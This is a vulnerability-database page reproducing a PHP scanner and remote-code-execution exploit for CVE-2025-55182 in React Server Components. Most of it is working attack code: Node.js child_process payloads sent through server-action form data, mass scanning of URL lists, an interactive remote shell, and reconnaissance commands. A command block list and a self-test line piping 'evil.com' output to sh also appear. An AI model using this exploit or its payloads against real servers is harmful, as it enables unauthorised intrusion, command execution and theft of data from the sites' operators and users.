Vulners
Lucene search
📄 React 19.2.0 PHP Scanner / Remote Code Execution
| Reporter | Title | Published | Views | Family All 458 |
|---|---|---|---|---|
 | Exploit for Deserialization of Untrusted Data in Facebook React | 31 Dec 202514:20 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Facebook React | 9 Dec 202506:46 | – | githubexploit |
| Exploit for CVE-2025-55182 | 4 Dec 202501:26 | – | githubexploit |
| Exploit for CVE-2025-55182 | 5 Dec 202517:47 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Facebook React | 7 Jan 202620:51 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Facebook React | 15 Dec 202514:56 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Facebook React | 6 Dec 202517:32 | – | githubexploit |
| Exploit for CVE-2025-55182 | 5 Dec 202508:40 | – | githubexploit |
| Exploit for CVE-2025-55182 | 4 Dec 202518:30 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Facebook React | 9 Dec 202503:48 | – | githubexploit |
10
=============================================================================================================================================
| # Title : React 19.2.0 PHP Scanner & RCE Exploit Tool |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://react.dev |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212444/ & CVE-2025-55182
[+] Summary : This project delivers a PHP-based vulnerability scanner and remote code execution (RCE) exploit for CVE‑2025‑55182 affecting React Server Components.
[+] includes:
Target scanning (single/multiple hosts)
Vulnerability detection
RCE payload execution
Interactive remote shell
Structured JSON parsing with fallback
Multipart form-data payload handling
The exploit leverages RSC serialization weaknesses to execute arbitrary commands and validate successful exploitation.
[+] POC :
<?php
/**
* by indoushka
*/
class CVE_2025_55182_Scanner_Secure {
// ANSI Color Codes with Windows fallback
private $colors = [];
private $user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
private $timeout = 10;
private $verify_ssl = false;
private $max_cmd_length = 200; // Maximum command length for safety
public function __construct() {
// Initialize colors based on OS
$this->init_colors();
// Suppress SSL warnings
if (function_exists('stream_context_set_default')) {
stream_context_set_default([
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false,
]
]);
}
}
private function init_colors() {
// Check if we're on Windows CMD without ANSI support
$is_windows = strtoupper(substr(PHP_OS, 0, 3)) === 'WIN';
$has_ansi_support = false;
if ($is_windows && PHP_SAPI === 'cli') {
// Try to detect ANSI support in Windows 10+
$has_ansi_support = (function_exists('sapi_windows_vt100_support') && sapi_windows_vt100_support(STDOUT))
|| getenv('ANSICON') !== false
|| getenv('ConEmuANSI') === 'ON'
|| getenv('TERM') === 'xterm';
} elseif (!$is_windows) {
$has_ansi_support = true; // Unix-like systems usually support ANSI
}
if ($has_ansi_support) {
$this->colors = [
'HEADER' => "\033[95m",
'BLUE' => "\033[94m",
'GREEN' => "\033[92m",
'WARNING' => "\033[93m",
'FAIL' => "\033[91m",
'ENDC' => "\033[0m",
'BOLD' => "\033[1m",
'CYAN' => "\033[96m",
'MAGENTA' => "\033[95m",
'BG_RED' => "\033[41m"
];
} else {
// No colors for unsupported terminals
$this->colors = array_fill_keys([
'HEADER', 'BLUE', 'GREEN', 'WARNING', 'FAIL',
'ENDC', 'BOLD', 'CYAN', 'MAGENTA', 'BG_RED'
], '');
}
}
private function color($name) {
return $this->colors[$name] ?? '';
}
private function print_info($msg) {
echo $this->color('BLUE') . "[*] " . $msg . $this->color('ENDC') . PHP_EOL;
}
private function print_success($msg) {
echo $this->color('GREEN') . "[+] " . $msg . $this->color('ENDC') . PHP_EOL;
}
private function print_error($msg) {
echo $this->color('FAIL') . "[-] " . $msg . $this->color('ENDC') . PHP_EOL;
}
private function print_warning($msg) {
echo $this->color('WARNING') . "[!] " . $msg . $this->color('ENDC') . PHP_EOL;
}
private function print_critical($msg) {
echo $this->color('BG_RED') . $this->color('BOLD') . "[CRITICAL] " . $msg . $this->color('ENDC') . PHP_EOL;
}
private function validate_command($cmd) {
// Check command length
if (strlen($cmd) > $this->max_cmd_length) {
$this->print_error("Command too long (max {$this->max_cmd_length} characters)");
return false;
}
// Block potentially dangerous commands in interactive mode
$dangerous_patterns = [
'/\brm\s+-rf\b/i',
'/\bmkfs\b/i',
'/\bdd\s+if=/i',
'/\bchmod\s+777\b/i',
'/\bwget\b.*\|\s*sh/i',
'/\bcurl\b.*\|\s*sh/i',
'/;.*;/', // Multiple command separators
'/`.*`/', // Backticks
'/\$\s*\(/', // $() syntax
'/\|\s*\{/', // Pipe to block
];
foreach ($dangerous_patterns as $pattern) {
if (preg_match($pattern, $cmd)) {
$this->print_warning("Potentially dangerous command detected and blocked");
return false;
}
}
return true;
}
private function sanitize_command($cmd) {
// Basic sanitization for different command types
$cmd = trim($cmd);
// Handle echo commands specially - remove quotes if present
if (preg_match('/^echo\s+/i', $cmd)) {
// Extract the part after echo
$echo_content = substr($cmd, 5);
$echo_content = trim($echo_content, " \t\n\r\0\x0B\"'");
// Only allow safe characters for echo
$echo_content = preg_replace('/[^\w\d\s\-_\.]/', '', $echo_content);
return 'echo ' . $echo_content;
}
// For other commands, allow more characters but still sanitize
$cmd = preg_replace('/[^\w\d\s\-_\.\/\\\,:;&|><=\[\]{}()@#!~`\$\+\-\*"\'?]/', '', $cmd);
// Limit consecutive special characters
$cmd = preg_replace('/([;&|])\1+/', '$1', $cmd);
return $cmd;
}
private function build_payload($cmd) {
// Multiple payload variations for different environments
$payloads = [
// Primary payload - standard Node.js RCE
[
"id" => "vm#runInThisContext",
"bound" => ["console.log('RCE_TEST'); process.mainModule.require('child_process').execSync('{$cmd}').toString()"]
],
// Alternative payload 1 - Different context
[
"id" => "vm#runInNewContext",
"bound" => ["global.process.mainModule.require('child_process').execSync('{$cmd}').toString()"]
],
// Alternative payload 2 - Using module constructor
[
"id" => "module#constructor",
"bound" => ["new module.constructor('return process')().mainModule.require('child_process').execSync('{$cmd}').toString()"]
],
// Alternative payload 3 - Direct require
[
"id" => "global#require",
"bound" => ["global.require('child_process').execSync('{$cmd}').toString()"]
]
];
// Return the primary payload (can be modified to try all)
return json_encode($payloads[0]);
}
private function send_payload($url, $cmd, $payload_variant = 0) {
// Validate command first
if (!$this->validate_command($cmd)) {
return [
'content' => null,
'headers' => [],
'status' => 0,
'success' => false,
'error' => 'Command validation failed'
];
}
// Sanitize command
$safe_cmd = $this->sanitize_command($cmd);
// Build payload based on variant
$payload = $this->build_payload($safe_cmd);
// Prepare multipart form data
$boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
$content = "--{$boundary}\r\n";
$content .= "Content-Disposition: form-data; name=\"\$ACTION_REF_0\"\r\n\r\n1\r\n";
$content .= "--{$boundary}\r\n";
$content .= "Content-Disposition: form-data; name=\"\$ACTION_0:0\"\r\n\r\n";
$content .= $payload . "\r\n";
$content .= "--{$boundary}--\r\n";
$headers = [
"Content-Type: multipart/form-data; boundary={$boundary}",
"User-Agent: {$this->user_agent}",
"Accept: */*",
"Connection: close",
"X-Requested-With: XMLHttpRequest",
"Origin: " . parse_url($url, PHP_URL_SCHEME) . "://" . parse_url($url, PHP_URL_HOST)
];
$context = stream_context_create([
'http' => [
'method' => 'POST',
'header' => implode("\r\n", $headers),
'content' => $content,
'timeout' => $this->timeout,
'ignore_errors' => true
],
'ssl' => [
'verify_peer' => $this->verify_ssl,
'verify_peer_name' => $this->verify_ssl
]
]);
try {
$start_time = microtime(true);
$response = @file_get_contents($url, false, $context);
$response_time = round((microtime(true) - $start_time) * 1000, 2);
$http_response_header = $http_response_header ?? [];
return [
'content' => $response,
'headers' => $http_response_header,
'status' => $this->get_http_status($http_response_header),
'success' => $response !== false,
'response_time' => $response_time,
'payload_variant' => $payload_variant,
'error' => $response === false ? error_get_last()['message'] ?? 'Unknown error' : null
];
} catch (Exception $e) {
$this->print_error("Connection error: " . $e->getMessage());
return [
'content' => null,
'headers' => [],
'status' => 0,
'success' => false,
'response_time' => 0,
'error' => $e->getMessage()
];
}
}
private function get_http_status($headers) {
if (empty($headers)) return 0;
$status_line = $headers[0];
preg_match('/HTTP\/\d\.\d\s+(\d+)/', $status_line, $matches);
return isset($matches[1]) ? (int)$matches[1] : 0;
}
private function generate_token($length = 16) {
$chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
$token = '';
for ($i = 0; $i < $length; $i++) {
$token .= $chars[random_int(0, strlen($chars) - 1)];
}
return $token;
}
private function extract_result_from_response($content, $token = null) {
$result = [
'type' => 'unknown',
'result' => null,
'error' => null,
'token_found' => false,
'json_valid' => false,
'raw_preview' => substr($content, 0, 200) . (strlen($content) > 200 ? '...' : '')
];
// Method 1: Try JSON parsing first
if (!empty($content)) {
$json_data = @json_decode($content, true);
if (json_last_error() === JSON_ERROR_NONE) {
$result['json_valid'] = true;
$result['type'] = 'json';
$result['full_json'] = $json_data;
if (isset($json_data['result'])) {
$result['result'] = $json_data['result'];
}
if (isset($json_data['error'])) {
$result['error'] = $json_data['error'];
}
if (isset($json_data['message'])) {
$result['error'] = $json_data['message'];
}
}
}
// Method 2: Look for token in raw response
if ($token !== null && !empty($content)) {
if (strpos($content, $token) !== false) {
$result['token_found'] = true;
$result['type'] = $result['type'] === 'unknown' ? 'raw' : $result['type'];
// Extract context around token
$pos = strpos($content, $token);
$start = max(0, $pos - 100);
$end = min(strlen($content), $pos + 100);
$context = substr($content, $start, $end - $start);
if (empty($result['result'])) {
$result['result'] = $context;
}
}
}
// Method 3: Try to extract from common patterns
if (empty($result['result']) && !empty($content)) {
$patterns = [
'/result["\']?\s*:\s*["\']?([^"\',}]+)/i',
'/output["\']?\s*:\s*["\']?([^"\',}]+)/i',
'/data["\']?\s*:\s*["\']?([^"\',}]+)/i',
'/<pre[^>]*>([^<]+)<\/pre>/i',
'/<code[^>]*>([^<]+)<\/code>/i'
];
foreach ($patterns as $pattern) {
if (preg_match($pattern, $content, $matches)) {
$result['result'] = trim($matches[1]);
$result['type'] = 'pattern';
break;
}
}
}
return $result;
}
public function scan($url, $detailed = false) {
$this->print_info("Scanning {$url} for CVE-2025-55182...");
$token = $this->generate_token(16);
$cmd = "echo " . $token; // No quotes needed for echo
$response = $this->send_payload($url, $cmd);
if (!$response['success'] || $response['content'] === null) {
$this->print_error("Failed to connect to target.");
$this->print_info("Error: " . ($response['error'] ?? 'Unknown'));
$this->print_info("Response time: {$response['response_time']}ms");
return false;
}
$content = $response['content'];
$analysis = $this->extract_result_from_response($content, $token);
if ($detailed) {
$this->print_info("=== Detailed Analysis ===");
$this->print_info("Response type: " . $analysis['type']);
$this->print_info("HTTP Status: " . $response['status']);
$this->print_info("Response time: {$response['response_time']}ms");
$this->print_info("JSON valid: " . ($analysis['json_valid'] ? 'Yes' : 'No'));
$this->print_info("Token found: " . ($analysis['token_found'] ? 'Yes' : 'No'));
if ($analysis['error']) {
$this->print_warning("Server error: " . $analysis['error']);
}
}
// Check for vulnerability
$is_vulnerable = false;
$confidence = 'low';
// High confidence: Token found in JSON result
if ($analysis['type'] === 'json' && $analysis['result'] && strpos($analysis['result'], $token) !== false) {
$is_vulnerable = true;
$confidence = 'high';
$this->print_success("HIGH CONFIDENCE: Token found in JSON result");
}
// Medium confidence: Token found in raw response
elseif ($analysis['token_found']) {
$is_vulnerable = true;
$confidence = 'medium';
$this->print_success("MEDIUM CONFIDENCE: Token found in raw response");
}
// Low confidence: Response looks like RCE output but no token
elseif ($analysis['result'] && preg_match('/\b(root|admin|www-data|user)\b/i', $analysis['result'])) {
$is_vulnerable = true;
$confidence = 'low';
$this->print_warning("LOW CONFIDENCE: RCE-like output detected");
}
if ($is_vulnerable) {
$this->print_success("Target appears to be VULNERABLE (confidence: {$confidence})!");
if ($analysis['result']) {
$output = trim($analysis['result']);
$output_preview = strlen($output) > 100 ? substr($output, 0, 100) . '...' : $output;
$this->print_info("Output preview: " . $output_preview);
}
// Try to get more info if detailed scan
if ($detailed) {
$this->print_info("Gathering system information...");
$info_cmds = [
'whoami' => 'Current user',
'uname -a || ver' => 'System info',
'pwd' => 'Current directory',
'id || whoami /all' => 'User details'
];
foreach ($info_cmds as $cmd => $desc) {
$resp = $this->send_payload($url, $cmd);
if ($resp['success'] && $resp['content']) {
$info = $this->extract_result_from_response($resp['content']);
if ($info['result']) {
$clean_result = trim(preg_replace('/\s+/', ' ', $info['result']));
$this->print_info("{$desc}: " . substr($clean_result, 0, 80));
}
}
usleep(50000); // 50ms delay
}
}
return ['vulnerable' => true, 'confidence' => $confidence];
} else {
$this->print_warning("Target does not appear to be vulnerable.");
if ($detailed) {
$this->print_info("Response preview: " . $analysis['raw_preview']);
}
return ['vulnerable' => false, 'confidence' => 'none'];
}
}
public function exploit($url) {
$this->print_critical("=== EXPLOIT MODE ACTIVATED ===");
$this->print_warning("You are about to exploit a vulnerable system.");
$this->print_warning("Make sure you have proper authorization!");
// Initial scan with details
$scan_result = $this->scan($url, true);
if (!$scan_result['vulnerable']) {
$this->print_error("Target is not vulnerable or confidence is too low.");
$this->print_info("Would you like to proceed anyway? (yes/no): ");
$response = trim(fgets(STDIN));
if (strtolower($response) !== 'yes') {
$this->print_info("Exploit cancelled.");
return;
}
$this->print_warning("Proceeding with low-confidence target...");
}
$this->print_success("Starting interactive shell on {$url}");
$this->print_info("Type 'help' for available commands, 'exit' to quit.");
// Get initial system info
$sysinfo = $this->get_system_info($url);
$user = $sysinfo['user'] ?? 'unknown';
$hostname = $sysinfo['hostname'] ?? 'unknown';
$platform = $sysinfo['platform'] ?? 'unknown';
// Interactive shell loop
$command_history = [];
while (true) {
// Build prompt with colors
$prompt = $this->color('GREEN') . $user . "@" . $hostname . $this->color('ENDC') .
" [" . $this->color('CYAN') . $platform . $this->color('ENDC') . "] " .
$this->color('BLUE') . $this->color('BOLD') . "> " . $this->color('ENDC');
echo $prompt;
// Get command input
if (function_exists('readline')) {
readline_completion_function(function($input, $index) {
$commands = ['help', 'exit', 'clear', 'sysinfo', 'history', 'pwd', 'ls', 'cd', 'cat', 'whoami', 'id'];
return array_filter($commands, function($cmd) use ($input) {
return stripos($cmd, $input) === 0;
});
});
$cmd = readline();
if ($cmd !== '') {
readline_add_history($cmd);
$command_history[] = $cmd;
}
} else {
$cmd = trim(fgets(STDIN));
if (!empty($cmd)) {
$command_history[] = $cmd;
}
}
// Handle exit
if (strtolower($cmd) === 'exit' || strtolower($cmd) === 'quit') {
$this->print_info("Exiting interactive shell...");
break;
}
// Handle empty command
if (empty($cmd)) {
continue;
}
// Handle special commands
switch (strtolower($cmd)) {
case 'help':
$this->show_help();
continue 2;
case 'clear':
case 'cls':
system(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN' ? 'cls' : 'clear');
continue 2;
case 'history':
$this->show_history($command_history);
continue 2;
case 'sysinfo':
$this->show_sysinfo($url);
continue 2;
case 'safe':
$this->print_info("Safe mode enabled - blocking dangerous commands");
$this->print_info("Current restrictions: rm, mkfs, dd, chmod 777, wget|sh, curl|sh");
continue 2;
}
// Validate command length
if (strlen($cmd) > $this->max_cmd_length) {
$this->print_error("Command too long (max {$this->max_cmd_length} characters)");
$this->print_info("Tip: Use redirects or split complex commands");
continue;
}
// Execute command
$start_time = microtime(true);
$response = $this->send_payload($url, $cmd);
$exec_time = round((microtime(true) - $start_time) * 1000, 2);
if ($response['success'] && $response['content']) {
$analysis = $this->extract_result_from_response($response['content']);
if ($analysis['result']) {
echo trim($analysis['result']) . PHP_EOL;
$this->print_info("Execution time: {$exec_time}ms | HTTP: {$response['status']}");
} elseif ($analysis['error']) {
$this->print_error("Server error: " . $analysis['error']);
} else {
$this->print_warning("Command executed but no output returned.");
$this->print_info("Response type: " . $analysis['type']);
}
} else {
$this->print_error("Command failed or no response.");
$this->print_info("Status: {$response['status']} | Time: {$response['response_time']}ms");
if ($response['error']) {
$this->print_info("Error: " . $response['error']);
}
}
// Small delay to avoid overwhelming the target
usleep(100000); // 100ms
}
$this->print_info("Session ended. Total commands executed: " . count($command_history));
}
private function get_system_info($url) {
$info = [
'user' => 'unknown',
'hostname' => 'unknown',
'platform' => 'unknown'
];
// Try multiple commands to get info
$commands = [
'whoami' => 'user',
'hostname || hostname' => 'hostname',
'uname -s -r -m || ver || systeminfo | findstr /B /C:"OS"' => 'platform'
];
foreach ($commands as $cmd => $key) {
$resp = $this->send_payload($url, $cmd);
if ($resp['success'] && $resp['content']) {
$analysis = $this->extract_result_from_response($resp['content']);
if ($analysis['result']) {
$info[$key] = trim($analysis['result']);
}
}
usleep(50000); // 50ms delay
}
return $info;
}
private function show_help() {
$help = [
'Basic Commands:' => [
'help' => 'Show this help message',
'exit, quit' => 'Exit the interactive shell',
'clear, cls' => 'Clear the terminal screen',
'history' => 'Show command history',
'sysinfo' => 'Display detailed system information',
'safe' => 'Show safe mode restrictions'
],
'File Operations:' => [
'pwd' => 'Print working directory',
'ls, ls -la, dir' => 'List directory contents',
'cat <file>' => 'View file contents',
'cd <dir>' => 'Change directory (note: may not persist)'
],
'System Info:' => [
'whoami' => 'Current user',
'id' => 'User ID and groups',
'uname -a' => 'System information',
'ps aux' => 'Running processes',
'netstat -an' => 'Network connections'
],
'Tips:' => [
'Command chaining' => 'Use && for sequential commands',
'Output redirection' => 'Use > to save output to file',
'Pipes' => 'Use | to chain commands',
'Background jobs' => 'Use & to run in background'
]
];
foreach ($help as $section => $commands) {
$this->print_info("\n{$section}");
foreach ($commands as $cmd => $desc) {
echo " " . str_pad($cmd, 25) . " - " . $desc . PHP_EOL;
}
}
}
private function show_history($history) {
if (empty($history)) {
$this->print_info("No command history yet.");
return;
}
$this->print_info("Command History:");
foreach ($history as $index => $cmd) {
echo " [" . ($index + 1) . "] " . $cmd . PHP_EOL;
}
}
private function show_sysinfo($url) {
$this->print_info("Gathering detailed system information...");
$checks = [
'System' => 'uname -a || ver',
'Kernel' => 'cat /proc/version 2>/dev/null || systeminfo | findstr /B /C:"OS"',
'CPU' => 'cat /proc/cpuinfo 2>/dev/null || wmic cpu get name',
'Memory' => 'free -h 2>/dev/null || wmic memorychip get capacity',
'Disk' => 'df -h 2>/dev/null || wmic logicaldisk get size,freespace,caption',
'Network' => 'ifconfig 2>/dev/null || ipconfig /all',
'Users' => 'who 2>/dev/null || query user',
'Processes' => 'ps aux | head -20 2>/dev/null || tasklist',
'Environment' => 'env 2>/dev/null || set',
'Packages' => 'dpkg -l 2>/dev/null || rpm -qa 2>/dev/null || pacman -Q'
];
foreach ($checks as $name => $cmd) {
$resp = $this->send_payload($url, $cmd);
if ($resp['success'] && $resp['content']) {
$analysis = $this->extract_result_from_response($resp['content']);
if ($analysis['result']) {
$output = trim($analysis['result']);
$preview = substr($output, 0, 100);
$this->print_info("{$name}: " . $preview . (strlen($output) > 100 ? '...' : ''));
}
}
usleep(100000); // 100ms delay
}
}
public function batch_scan($file_path, $output_report = true) {
if (!file_exists($file_path)) {
$this->print_error("File not found: {$file_path}");
return;
}
$urls = file($file_path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
if (!$urls) {
$this->print_error("No URLs found in file.");
return;
}
$this->print_info("Loaded " . count($urls) . " URLs from {$file_path}");
$this->print_warning("Batch scan starting. This may take a while...");
$results = [
'high_confidence' => [],
'medium_confidence' => [],
'low_confidence' => [],
'not_vulnerable' => [],
'errors' => []
];
$start_time = time();
foreach ($urls as $index => $url) {
$url = trim($url);
if (empty($url)) continue;
$current = $index + 1;
$total = count($urls);
$percent = round(($current / $total) * 100, 1);
$elapsed = time() - $start_time;
$eta = $total > 0 ? round(($elapsed / $current) * ($total - $current)) : 0;
$this->print_info("Scanning [{$current}/{$total}] ({$percent}%) ETA: {$eta}s - {$url}");
try {
$result = $this->scan($url, false);
if ($result['vulnerable']) {
switch ($result['confidence']) {
case 'high':
$results['high_confidence'][] = $url;
break;
case 'medium':
$results['medium_confidence'][] = $url;
break;
case 'low':
$results['low_confidence'][] = $url;
break;
}
} else {
$results['not_vulnerable'][] = $url;
}
} catch (Exception $e) {
$results['errors'][] = $url . " - " . $e->getMessage();
}
// Progress delay
usleep(300000); // 300ms
}
// Generate report
$this->print_info("\n" . str_repeat("=", 60));
$this->print_info("BATCH SCAN COMPLETE");
$this->print_info("Total time: " . (time() - $start_time) . " seconds");
$this->print_info(str_repeat("-", 60));
$categories = [
'high_confidence' => ['High Confidence Vulnerable', $this->color('GREEN')],
'medium_confidence' => ['Medium Confidence Vulnerable', $this->color('WARNING')],
'low_confidence' => ['Low Confidence Vulnerable', $this->color('CYAN')],
'not_vulnerable' => ['Not Vulnerable', $this->color('FAIL')],
'errors' => ['Errors', $this->color('FAIL')]
];
foreach ($categories as $key => [$label, $color]) {
$count = count($results[$key]);
echo $color . "[*] " . str_pad($label, 30) . ": " . $count . $this->color('ENDC') . PHP_EOL;
}
// Save report if requested
if ($output_report) {
$report_file = 'cve_scan_report_' . date('Y-m-d_H-i-s') . '.txt';
$report_content = "CVE-2025-55182 Scan Report\n";
$report_content .= "Generated: " . date('Y-m-d H:i:s') . "\n";
$report_content .= "Total URLs: " . count($urls) . "\n\n";
foreach ($categories as $key => [$label, $color]) {
$report_content .= "\n=== {$label} ===\n";
foreach ($results[$key] as $item) {
$report_content .= $item . "\n";
}
}
file_put_contents($report_file, $report_content);
$this->print_success("Detailed report saved to: {$report_file}");
}
return $results;
}
private function print_banner() {
$banner = $this->color('HEADER') . $this->color('BOLD') . "
╔══════════════════════════════════════════════════════════╗
║ CVE-2025-55182 Scanner & Exploit Tool ║
║ React Server Components RCE Vulnerability ║
╚══════════════════════════════════════════════════════════╝" . $this->color('ENDC') . "
" . $this->color('CYAN') . "[*] Features:" . $this->color('ENDC') . "
• Multi-payload support for different environments
• Command validation and sanitization
• Confidence-based vulnerability detection
• Interactive shell with command history
• Batch scanning with detailed reporting
• Safe mode to prevent dangerous commands
" . $this->color('WARNING') . "[!] SECURITY WARNING:" . $this->color('ENDC') . "
• This tool is for AUTHORIZED security testing ONLY
• Unauthorized use is ILLEGAL and UNETHICAL
• Use only on systems you OWN or have PERMISSION to test
" . $this->color('FAIL') . $this->color('BOLD') . "[!] LEGAL NOTICE: You are responsible for your actions!" . $this->color('ENDC') . "
";
echo $banner . PHP_EOL;
}
public function run() {
$this->print_banner();
if (PHP_SAPI !== 'cli') {
$this->print_error("This tool must be run from command line.");
echo "For web interface, use the separate web version." . PHP_EOL;
exit(1);
}
global $argv;
if (count($argv) < 2) {
$this->show_help();
exit(1);
}
$mode = $argv[1];
switch ($mode) {
case 'scan':
if (isset($argv[2]) && $argv[2] === '-u' && isset($argv[3])) {
$this->scan($argv[3], true);
} elseif (isset($argv[2]) && $argv[2] === '-f' && isset($argv[3])) {
$this->batch_scan($argv[3]);
} else {
$this->show_help();
}
break;
case 'exploit':
if (isset($argv[2]) && $argv[2] === '-u' && isset($argv[3])) {
$this->exploit($argv[3]);
} else {
$this->show_help();
}
break;
case 'test':
$this->test_mode();
break;
case 'help':
case '--help':
case '-h':
$this->show_help();
break;
default:
$this->print_error("Unknown mode: {$mode}");
$this->show_help();
exit(1);
}
}
private function test_mode() {
$this->print_info("Running comprehensive self-test...");
// Test token generation
$token = $this->generate_token(10);
$this->print_success("Token generation: OK ({$token})");
// Test command validation
$test_cmds = [
'echo test' => true,
'whoami' => true,
'ls -la' => true,
str_repeat('a', 201) => false, // Too long
'rm -rf /' => false, // Dangerous
'wget http://evil.com | sh' => false // Dangerous pattern
];
foreach ($test_cmds as $cmd => $expected) {
$result = $this->validate_command($cmd);
$status = $result === $expected ? 'OK' : 'FAIL';
$color = $result === $expected ? 'GREEN' : 'FAIL';
echo $this->color($color) . "[TEST] Command validation '{$cmd}': {$status}" . $this->color('ENDC') . PHP_EOL;
}
// Test payload building
$payload = $this->build_payload('test');
$json_test = json_decode($payload, true);
$this->print_success("Payload building: " . (json_last_error() === JSON_ERROR_NONE ? 'OK' : 'FAIL'));
// Test required functions
$required = ['json_encode', 'file_get_contents', 'random_bytes', 'preg_match'];
$all_ok = true;
foreach ($required as $func) {
if (!function_exists($func)) {
$this->print_error("Missing function: {$func}");
$all_ok = false;
}
}
if ($all_ok) {
$this->print_success("All required functions available");
}
$this->print_info("Self-test completed.");
}
private function show_help() {
echo $this->color('BOLD') . "CVE-2025-55182 Enhanced Scanner & Exploit Tool" . $this->color('ENDC') . PHP_EOL;
echo $this->color('CYAN') . "Version: 2.0 | Enhanced Security Edition" . $this->color('ENDC') . PHP_EOL . PHP_EOL;
echo "Usage:" . PHP_EOL;
echo " php " . basename(__FILE__) . " [mode] [options]" . PHP_EOL . PHP_EOL;
echo "Modes:" . PHP_EOL;
echo " scan - Check target vulnerability (detailed analysis)" . PHP_EOL;
echo " exploit - Interactive exploit shell (requires vulnerable target)" . PHP_EOL;
echo " test - Run self-test to verify functionality" . PHP_EOL;
echo " help - Show this help message" . PHP_EOL . PHP_EOL;
echo "Scan Options:" . PHP_EOL;
echo " -u URL - Single target URL (detailed scan)" . PHP_EOL;
echo " -f FILE - File containing list of URLs (batch scan)" . PHP_EOL . PHP_EOL;
echo "Exploit Options:" . PHP_EOL;
echo " -u URL - Target URL to exploit (interactive shell)" . PHP_EOL . PHP_EOL;
echo "Security Features:" . PHP_EOL;
echo " • Command length limitation (max 200 chars)" . PHP_EOL;
echo " • Dangerous command blocking" . PHP_EOL;
echo " • Confidence-based vulnerability detection" . PHP_EOL;
echo " • Safe mode for interactive shell" . PHP_EOL . PHP_EOL;
echo "Examples:" . PHP_EOL;
echo " php " . basename(__FILE__) . " scan -u https://target.com/api" . PHP_EOL;
echo " php " . basename(__FILE__) . " scan -f targets.txt" . PHP_EOL;
echo " php " . basename(__FILE__) . " exploit -u https://target.com/api" . PHP_EOL;
echo " php " . basename(__FILE__) . " test" . PHP_EOL;
echo $this->color('WARNING') . PHP_EOL . "[!] Legal Notice: For authorized testing only!" . $this->color('ENDC') . PHP_EOL;
echo $this->color('FAIL') . "[!] By using this tool, you accept full responsibility for your actions." . $this->color('ENDC') . PHP_EOL;
}
}
// Main execution
if (PHP_SAPI === 'cli' && isset($argv[0]) && basename($argv[0]) === basename(__FILE__)) {
$scanner = new CVE_2025_55182_Scanner_Secure();
$scanner->run();
}
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Dec 2025 00:00Current
8.7High risk
Vulners AI Score8.7
CVSS 3.110
EPSS0.82011